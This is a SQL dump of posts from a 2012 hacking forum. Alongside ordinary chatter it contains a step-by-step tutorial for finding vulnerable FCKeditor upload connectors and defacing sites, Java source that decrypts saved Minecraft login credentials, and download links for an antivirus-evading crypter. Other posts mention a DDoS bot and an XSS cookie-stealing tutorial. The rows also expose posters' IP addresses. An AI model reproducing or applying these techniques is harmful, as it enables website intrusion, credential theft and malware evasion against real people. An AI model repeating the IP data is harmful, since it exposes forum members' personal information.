[url=https://www.virustotal.com/file/8c60f92332a276a1ec325c9ff549fa363895efaf3d76eabff6b4ad188fd9088f/analysis/1345135727/]Click here[/url] [color=#FF0000]The API is down for the Skype IP Finder. This program no longer works.[/color] - LH staff, thanks to OP for the heads up.', '85.165.36.95', '1436886111', '1', '0', '1', '1345756859', '1', '4c1ff623fc61701fcff38d470a6f453f', '0', '1345756859'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('326', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '53', 'sirchamp', '1345141006', 'Looks nice even tough the green color makes it look like l33thackers forum.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '16cd83b1f8a2b948c2718896b70df7f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('327', '60', '146', '25', 'RE: [guide] Basic Computer Security', '0', '53', 'sirchamp', '1345141325', 'Microsoft Security Essentials is also a good free antivirus.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '826733928ae5d671bd5a1c16035e376c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('328', '99', '326', '3', 'RE: [Previews added]New theme for LH', '0', '1', 't3h jok3r', '1345141726', '[quote=\'sirchamp\' pid=\'326\' dateline=\'1345141006\'] Looks nice even tough the green color makes it look like l33thackers forum. [/quote] Your right. The theme is the same theme, but it\'s a free theme. I have added the theme a lot and made several changes. L33THackers is mostly down in my opinion so I don\'t think it should be any problems.', '41.174.5.68', '699270468', '1', '0', '0', '0', '1', 'ddf77506815a7328e33840e3c29bc123', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('329', '128', '320', '19', '[Junk]MoneyBookers acc with ~100$ on it.', '0', '1', 't3h jok3r', '1345142810', 'This thread has been junked.', '41.174.5.68', '699270468', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('330', '120', '301', '4', 'RE: reloadz0r is here', '0', '9', 'p420', '1345143198', 'Welcome to LH. I agree, it\'s nice to have an idea of everything.', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '5605dc936f7492681b3561c1bbf74f2c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('331', '14', '39', '8', 'RE: Work Hard Play Hard-Rap', '0', '9', 'p420', '1345143271', 'I like the song too, even tough I\'m not into rap that much.', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '93e6752f12910efdbc0906ac3d37b15d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('332', '129', '324', '8', 'RE: ss501 because i\'m stupid(korean)', '0', '9', 'p420', '1345143328', 'I\'m not being racist, just curious. Are you Korean?', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '6c3fe0189414f0bb1ea7fcab12b062f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('333', '107', '261', '12', 'RE: how to change the icon of an exe file using resource hacker', '0', '9', 'p420', '1345143902', 'Well-detailed tutorial. Thanks, but next time please concentrate at your grammar.', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', 'f97f99113bf8f2fea504f09833fbead7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('334', '103', '249', '12', 'RE: [Tutorial] Stealing Cookies With XSS', '0', '9', 'p420', '1345143986', 'You clearly copied and pasted it. You could\'ve atleast added the proper codes. Anyways, nice thread.', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '110ec1e77c10d2cc57c37c560613aa4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('335', '131', '0', '12', '[tut]How to change IP address within seconds.', '0', '9', 'p420', '1345144158', '[align=center][size=medium][color=#1E90FF]Want to change your IP Address quicker than ever ? without downloading anything? You can now learn how to do that quick and hassle free ![/color][/size] [/align] [align=center][video=youtube]http://www.youtube.com/watch?v=SrWTGaYP37A[/video][/align] [/quote]', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', 'c10458a50eff3e264fa88766e625593a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('336', '95', '225', '13', 'RE: XSS Cheat Sheet', '0', '12', 'jonas83', '1345144272', 'That\'s some big ass tutorial.', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '7a9a560a366080d7d953ac493932f5b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('337', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '12', 'jonas83', '1345144395', 'Yippee. I\'m the first downloader. Works like charm and neatly coded. Nice Share.', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '058b250e8a11dd8939047cef70bf46d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('338', '132', '0', '20', '[Forever FUD]No Dependency Crypter!', '0', '1', 't3h jok3r', '1345145205', '[align=center]Hey guyz, I just hacked a no dependency source and a friend helped me to compile it, so now I\'m sharing it with u :D. So here\'s a scan: [i]File Info[/i] Report date: 2012-08-15 20:25:13 (GMT 1) File name: [b]not-detected-exe[/b] File size: 1106806 bytes MD5 Hash: 083c9e82b537c0120dbe99fc73a12786 SHA1 Hash: 60789a3e8642931dad95ffded722b5ef90e6fb09 Detection rate: [color=red]1[/color] on 14 ([color=red]7%[/color]) Status: [color=red]INFECTED[/color] [i]Detections[/i] Asquared - [color=red][/color] Avast - [color=red][/color] AVG - [color=red][/color] Avira - [color=red][/color] BitDefender - [color=red][/color] ClamAV - [color=red][/color] Comodo - [color=red][/color] DrWeb - [color=red][/color] Fprot - [color=red][/color] IkarusT3 - [color=red][/color] Panda - [color=red][/color] STOPZilla - [color=red]Trojan.Win32.Mal.Gen.36092[/color] TrendMicro - [color=red][/color] VBA32 - [color=red][/color] [i]Scan report generated by [url=http://novirusthanks.org]NoVirusThanks.org[/url][/i] http://vscan.novirusthanks.org/analysis/083c9e82b537c0120dbe99fc73a12786/bm90LWRldGVjdGVkLWV4ZQ==/ You can get it fud if you insert a really complicated key, so if you get a good one u will get it FUD for long time. Here\'s an img with the crypter: [img]http://uploadimage.ro/images/66074166845554104963.png[/img][/align] Download link: [align=center][url=http://fileice.net/download.php?file=3ew6o][img]http://img833.imageshack.us/img833/319/coollogocom241633070.png[/img][/url][/align] OR http://stereo-engineer.info/File.html', '41.174.5.68', '699270468', '1', '0', '0', '0', '1', '8b6dfe4f42f4441b0c1e3717de1bb387', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('339', '133', '0', '23', 'Online Scanners list', '0', '19', 'yazz', '1345145459', '[align=center][size=xx-large][color=#9370DB]Online Anti-Malware (File) Scanners[/color][/size] [color=#A9A9A9]This is a list of online scanners that will check uploaded files for malware using antivirus engines. You can use these scanners to determine if a file is safe or malicious without putting your system at risk. [color=#00BFFF][align=center][size=x-large]Multiple Antivirus Engines[/color][/size][/align][/color] [align=center][url=http://www.virustotal.com/][IMG]http://i.imgur.com/9LrYm.jpg[/IMG][/url][/align] Virustotal uses 40 AV engines. This service has an excellent detection rate. It gives detailed results from each AV engine and provides real time global statistics. Note: VirusTotal also has an uploader program (140KB) that will automatically sends files to VirusTotal without you opening your web browser. 20 MB file size limit. [align=center][url=http://virusscan.jotti.org][IMG]http://i.imgur.com/h4QVi.png[/IMG][/url][/align] it uses 20 AV engines. 20 MB file size limit.it is a free online service that enables you to scan suspicious files with several anti-virus programs. [url=http://virscan.org/] [IMG]http://i.imgur.com/yVkUE.gif[/IMG][/url] it uses 37 AV engines. 20 MB file size limit. [align=center][url=http://vscan.novirusthanks.org/] [IMG]http://i.imgur.com/hsnyb.jpg[/IMG][/url] [/align] Novirusthanks uses 5 AV engines. 20 MB file size limit. Note: NoVirusThanks also has an uploader program. [align=center][url=http://www.viruschief.com/] [IMG]http://i.imgur.com/q326R.png[/IMG][/url][/align] 13 AV engines. 10 MB file size limit. VirusChief offers a free service for online virus scan suspicious files (which *could* contain a computer virus) using several antivirus online virus scan engines. [align=center][url=http://www.filterbit.com/] [IMG]http://i.imgur.com/fFpdT.jpg[/IMG][/url][/align] 10 AV engines. 20 MB file size limit. Filterbit is another VirSCAN similar service that lets you scan files online in search of Trojans or any other kind of malware using multiple antirivus in the analysis. [align=center][url=http://bugbopper.com/SubmitAFile.asp] [IMG]http://i.imgur.com/F5EEJ.png[/IMG][/url][/align] 8 AV engines. [align=center][url=http://www.garyshood.com/virus/] Gary\'s Hood[/url] it uses 5 AV engines. 10 MB file size limit. [url=http://www.allthreats.com/index.pl] Allthreats[/url][/align] uses 3 AV engines. 10 MB file size limit. [hr] [size=xx-large][color=#00BFFF][align=center]Single Antivirus Engine[/align][/color][/size] [align=center][url=http://onlinescan.avast.com/][IMG]http://i.imgur.com/lhZZj.png[/IMG][/url][/align] Avast! online virus scanner gives the possibility to check your files quickly and free of charge. 16 MB file size limit. [align=center][url=http://vms.drweb.com/online/][IMG]http://i.imgur.com/WqJS5.png[/IMG][/url][/align] Your files will be checked by the latest version of the Dr.Web Antivirus. [align=center][url=http://www.kaspersky.com/scanforvirus][IMG]http://i.imgur.com/50HAv.png[/IMG][/url][/align] The Kaspersky Online Virus Scanner scans your computer for malicious code and offers the same exceptional detection rates as other Kaspersky Lab products. 1 MB file size limit. [align=center][url=http://www.fortiguard.com/antivirus/virus_scanner.html][IMG]http://i.imgur.com/qhh8a.png[/IMG][/url][/align] Your files will be scanned using FortiClient AV engine. 1 MB file size limit. [align=center][url=http://www.arcabit.com/check_files][IMG]http://i.imgur.com/MpS5x.gif[/IMG][/url][/align] Uses the ArcaVir AV engine. [align=center][url=http://www.pandasecurity.com/homeusers/solutions/activescan/][IMG]http://i.imgur.com/PpXpn.png[/IMG][/url][/align] Panda ActiveScan is an advanced online scanner based on Collective Intelligence (scanning in the cloud) that detects malware that traditional security solutions cannot detect. [align=center] [url=http://housecall.trendmicro.com/][IMG]http://i.imgur.com/aBZ90.png[/IMG][/url][/align] Trend Micro HouseCall™ is an online application that scans, detects and cleans your computer of possible infection by viruses, spyware, or other malware. [align=center][url=http://security.symantec.com/sscv6/home.asp?langid=ie&venid=sym&plfid=23&pkj=GHHRPWFYJOKMFIDPMSV][IMG]http://i.imgur.com/Pyb2D.png[/IMG][/url][/align] Symantec Security Check tests your computer’s exposure to a wide range of online threats. It’s free and an effective tool that helps determine your Internet security needs. [align=center] [url=http://www.eset.com/onlinescan/][IMG]http://i.imgur.com/7JJVs.png[/IMG][/url][/align] ESET Online Scanner is a user friendly, free and powerful tool which you can use to remove malware from any PC utilizing only your web browser without having to install anti-virus software. [align=center][url=http://www.f-secure.com/en_EMEA/security/security-lab/tools-and-services/online-scanner/][IMG]http://i.imgur.com/MZhDQ.png[/IMG][/url][/align] F-Secure Online Scanner can help get rid of viruses and spyware causing problems on your PC. [align=center][url=http://www.bitdefender.com/scanner/online/free.html][IMG]http://i.imgur.com/o13RA.png[/IMG][/url][/align] BitDefender Online Scanner is an on-demand antivirus and antispyware tool that shows how safe your PC is. [align=center][url=http://home.mcafee.com/Downloads/FreeScan.aspx][IMG]http://i.imgur.com/yyDQz.png[/IMG][/url][/align] McAfee FreeScan helps you detect thousands of viruses on your computer. FreeScan searches for viruses, including the latest known “in the wild” viruses, and displays a detailed list of any infected files. [align=center][url=http://cainternetsecurity.net/entscanner/][IMG]http://i.imgur.com/blG8w.png[/IMG][/url][/align] The CA Online Threat Scanner scans your computer for viruses and spyware and can detect malware threats from within your web browser. [url=http://onecare.live.com/site/en-US/default.htm][IMG]http://i.imgur.com/yEtLq.png[/IMG][/url] Windows Live OneCare safety scanner is a free service designed to help ensure the health of your PC. [hr] [size=x-large][align=center][color=#00BFFF]Automated Malware Analysis Services [/color][/align][/size] [align=center](Analyze file behavior) The following services analyze your submitted files on a test (sandbox) system and then sends you a report on what it saw.[/align] [url=http://www.sunbeltsecurity.com/sandbox/] [IMG]http://i.imgur.com/XhbhQ.jpg[/IMG][/url] 12 MB file size limit. (Results by email) [url=http://anubis.iseclab.org/] [IMG]http://i.imgur.com/n3qRe.png[/IMG][/url] 8 MB file size limit. The file must be a Windows executable. [url=http://wepawet.iseclab.org/] [IMG]http://i.imgur.com/HwnDe.png[/IMG][/url] it detects and analyzes web-based malware. It currently handles Flash, JavaScript and PDF files. [url=http://www.threatexpert.com/submit.aspx][IMG]http://i.imgur.com/fm3yg.jpg[/IMG][/url] 5 MB file size limit. (Results by email) Note: ThreatExpert also has a uploader program (944KB). [align=center][url=https://vms.drweb.com/sendvirus/][img]http://i.imgur.com/WqJS5.png[/img][/url][/align] Results by email. [url=http://camas.comodo.com/] [IMG]http://i.imgur.com/rtIJY.png[/IMG][/url] Comodo Instant Malware Analysis [url=http://valkyrie.comodo.com/] [IMG]http://i.imgur.com/rtIJY.png[/IMG][/url] Comodo File Verdict Service (Valkyrie) 20 MB file size limit. [url=http://www.norman.com/security_center/security_tools/] [IMG]http://i.imgur.com/YiDCF.gif[/IMG][/url] Norman Sandbox , results by email. [align=center][url=http://www.joesecurity.org/service.php] Joe Sandbox[/url][/align] 12 MB file size limit. Registration required. (Results by email) [align=center][url=http://www.xandora.net/upload/] Xandora[/url][/align] 10 MB file size limit (15 to 30 minutes processing time). [align=center][url=https://www.vicheck.ca/]viCheck.ca[/url][/align] Decrypts and extracts malicious executables from common document formats. 10 MB file size limit. (Results by email) Source: [code]http://realsecurity.web.officelive.com/filescanners.aspx http://whatsonmypc.wordpress.com/2009/08/30/onlinescan/[/code] [/align]', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '1c6333b6cd5345599e3ffb8f720f1cb7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('340', '120', '301', '4', 'RE: reloadz0r is here', '0', '1', 't3h jok3r', '1345151031', 'Welcome to L33T Hacking. Hope you enjoy your stay.', '41.174.53.130', '699282818', '1', '0', '0', '0', '1', '957d8909edbf136d5f20705d3742109a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('341', '134', '0', '47', 'Win $10 for referring people', '0', '1', 't3h jok3r', '1345151263', 'Win $10 via PayPal for referring 5 HQ and active people. We recommend you to use the refer a member or quick referral link which both can be accessed in your UCP. Contest ends>Till the first winner is crowned.', '41.174.53.130', '699282818', '1', '0', '0', '0', '1', '01abda5fbc292d81a748ea9d98cd012c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('342', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '62', 'R?????zo?', '1345153919', 'I\'d love this, could you PM me. Thanks', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '179ffcb93370ccec818c8d6e8d84afed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('343', '16', '42', '11', 'RE: Is Hacking legal or illegal?', '0', '60', 'Linux', '1345178009', 'Hacking is illegal and it\'s a kinda art.', '117.206.89.155', '1976457627', '0', '0', '0', '0', '1', '59c4090b5db7b5e1425bfea138dda33e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('344', '49', '126', '21', 'RE: Pandora DDOS Bot [Direct Link]', '0', '61', 'NXK', '1345180204', 'Hey, I\'m interested in this, What kind of ddos commands does it have?', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '56d521d328575a49d0d173c503ad70e9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('345', '135', '0', '43', 'Astro Pid [free4all] mediafire', '0', '61', 'NXK', '1345180664', '[img]http://2.bp.blogspot.com/-PIPwZrN7sQo/T51nqnC0xLI/AAAAAAAAAkM/Xz7KenOuh8o/s1600/AstroPID+3.jpg[/img]I have a clean astro pid for everyone, Iv used it myself and can say it\'s awesome. dl http://adf.ly/BxxUh', '99.253.65.17', '1677541649', '0', '0', '61', '1345180697', '1', '218f3bf2c016f2181d1142d9a97924ee', '0', '1345180697'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('346', '134', '341', '47', 'RE: Win $10 for referring people', '0', '54', 'Sin Cara', '1345181744', 'nice contest!!! will bring HQ members :)', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', '1afcc11f807a83e9430793db7c2b9d10', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('347', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '54', 'Sin Cara', '1345181947', 'The theme looks really cool now:)', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', 'b1f849b2515b809a9ddc647003d0d813', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('348', '43', '105', '7', 'RE: How did you find us?', '0', '54', 'Sin Cara', '1345182093', 'I m here because of t3h jok3r. lol :)', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', 'b4d11e20be055762da1d472e070f4663', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('349', '112', '342', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1345182864', '[quote=\'R?????zo?\' pid=\'342\' dateline=\'1345153919\'] I\'d love this, could you PM me. Thanks [/quote] PPD ebooks pack is sent... check your pm now. :) [hr] [quote=\'Triple H\' pid=\'299\' dateline=\'1345062928\'] I would like a download link. Thanks, but is this [censored] or file ice? [/quote] PPD ebooks pack is sent... check your pm now. :)', '119.154.22.176', '2006587056', '1', '0', '54', '1345182889', '1', '6124b79cc8c5a6ddf3bf3dc53134d24e', '0', '1345182889'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('350', '120', '301', '4', 'RE: reloadz0r is here', '0', '54', 'Sin Cara', '1345183453', 'Welcome to LH... Stay active, be HQ and read rules :)', '119.154.22.176', '2006587056', '1', '0', '54', '1345218816', '1', '4c4009383a7650ddf0ecb31dc2a0c3fc', '0', '1345218816'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('351', '108', '262', '4', 'RE: Hey all', '0', '54', 'Sin Cara', '1345183500', 'Welcome to LH! Stay active, be HQ and read rules :)', '119.154.22.176', '2006587056', '1', '0', '54', '1345218864', '1', '71b958768ffc7d07c75c946c3ffcfa64', '0', '1345218864'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('352', '115', '290', '48', 'RE: [tut] How to Moderate LH as a MOD', '0', '54', 'Sin Cara', '1345183570', 'Thanks for this guide.... I will try my best to do my job :)', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', '1dc4d0f7967090edc0a8c66d6e056f00', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('353', '136', '0', '53', '[Java] Minecraft Lastlogin Decrypter [Source]', '0', '54', 'Sin Cara', '1345183757', '[color=#FF0000][b]Credits to me for sharing and credits to kamito as he is original author.[/b][/color] [code]import java****.*; import javax.crypto.*; import java.util.*; import javax.crypto.spec.*; public class test { public static void main(String[] args) { new test(); } public String user = \"\"; public String pass = \"\"; public test() { readUsername(); System.out.println(user+\" \"+pass); } private void readUsername() { try { //File lastLogin = new File(Util.getWorkingDirectory(), \"lastlogin\"); File lastLogin = new File(\"./lastlogin\"); Cipher cipher = getCipher(2, \"passwordfile\"); DataInputStream dis; if (cipher != null) dis = new DataInputStream(new CipherInputStream(new FileInputStream(lastLogin), cipher)); else { dis = new DataInputStream(new FileInputStream(lastLogin)); } user = dis.readUTF(); pass = dis.readUTF(); dis.close(); } catch (Exception e) { e.printStackTrace(); } } private Cipher getCipher(int mode, String password) throws Exception { Random random = new Random(43287234L); byte[] salt = new byte[8]; random.nextBytes(salt); PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5); SecretKey pbeKey = SecretKeyFactory.getInstance(\"PBEWithMD5AndDES\").generateSecret(new PBEKeySpec(password.toCharArray())); Cipher cipher = Cipher.getInstance(\"PBEWithMD5AndDES\"); cipher.init(mode, pbeKey, pbeParamSpec); return cipher; } }[/code]', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', '241f30d0ecdeafa5a0829871f8af4abe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('354', '137', '0', '13', '[TuT] How to exploit a vulnerable site', '0', '54', 'Sin Cara', '1345183925', '[color=#DAA520][b]Note:[/b][/color] Credits to original author. I just shared it. [b][color=#1E90FF][size=6]How to exploit a vulnerable site[/size][/color][/b] [b][size=5][color=#1E90FF]What is this?[/color][/size][/b] This is a tutorial showing you how to exploit vulnerable sites. If you continue to read on, I suggest using this tutorial for educational purposes only. [color=#1E90FF][b]Lets get started[/b][/color] First you need to find a vulnerable site. You may say how do I find these vulnerable sites, well first off go to google.com and type in [spoiler][quote]admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html[/quote][/spoiler] Once you find a site that looks like this [IMG]http://i46.tinypic.com/2jb4px2.jpg[/IMG] Where it says Connector change ASP to PHP [b][color=#1E90FF][size=5]Download[/size][/color][/b] Now next, download Horny Monkeys Deface Builder [spoiler]HMDB - http://www.mediafire.com/?wozc676q35eoby5[/spoiler] Virus Total - https://www.virustotal.com/file/580f4198bbb4cca8a5979f108a46392338c8f246e31bffae595d6c9e02550367/analysis/1337460492/ Once you have downloaded that Open it up, and Enter what you would like it to do. [IMG]http://i45.tinypic.com/2q83g2w.png[/IMG] Once you have done that, click \"Build\" then the HTML code to the right Highlight it and press ctrl + c to copy it. Once you have copied it paste it in notepad and save it as \"anything.html\" to your desktop. [b][size=5][color=#1E90FF]Time To Test Everything Out Now[/color][/size][/b] Go here - www.example.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html Once you get there change ASP to PHP. Click choose file and open the html file that you saved to your desktop. Now click upload. Once it\'s done, go to the site name then put the name of your file at the end of it [spoiler]Example - http://www.example.com/localinjected.html[/spoiler] Now your done :)', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', '633ce2c8569d12d81c59633915917fae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('355', '138', '0', '35', 'Make Cool Logo in just 20 sec....[HOT]', '0', '54', 'Sin Cara', '1345184294', '[color=#800080][b]hi ![/b][/color] [color=#FF1493][b]I just found a site on which you can make a cool logo for free...........[/b][/color] [url=http://adfoc.us/136522138601]http://supalogo.com/[/url] I hope it will work for you!!!!', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', 'ee91a5db41cad982e0147dcb89082aca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('356', '139', '0', '12', 'Get 60 Minutes skype credit FREE!', '0', '54', 'Sin Cara', '1345185208', '[b][color=#ff0000]1.[/color] Download [url=http://anchorfree.com/downloads/hotspot-shield/]Hotspotshield[/url] . [color=#ff0000]2.[/color] Switch On/Connect Hotspotshield. [color=#ff0000]3.[/color] Go to this link: http://skype.hotspotshield.com/banner.php [color=#ff0000]4.[/color] Click on \"Get Free Voucher Now\" [color=#ff0000]5.[/color] Copy the voucher code. [color=#ff0000]6.[/color] Sign in to your skype account using the link provided under the voucher code. [color=#ff0000]7.[/color] Enter the code and redeem it. [/b] [color=#00ff00][b]This tutorial has been made by 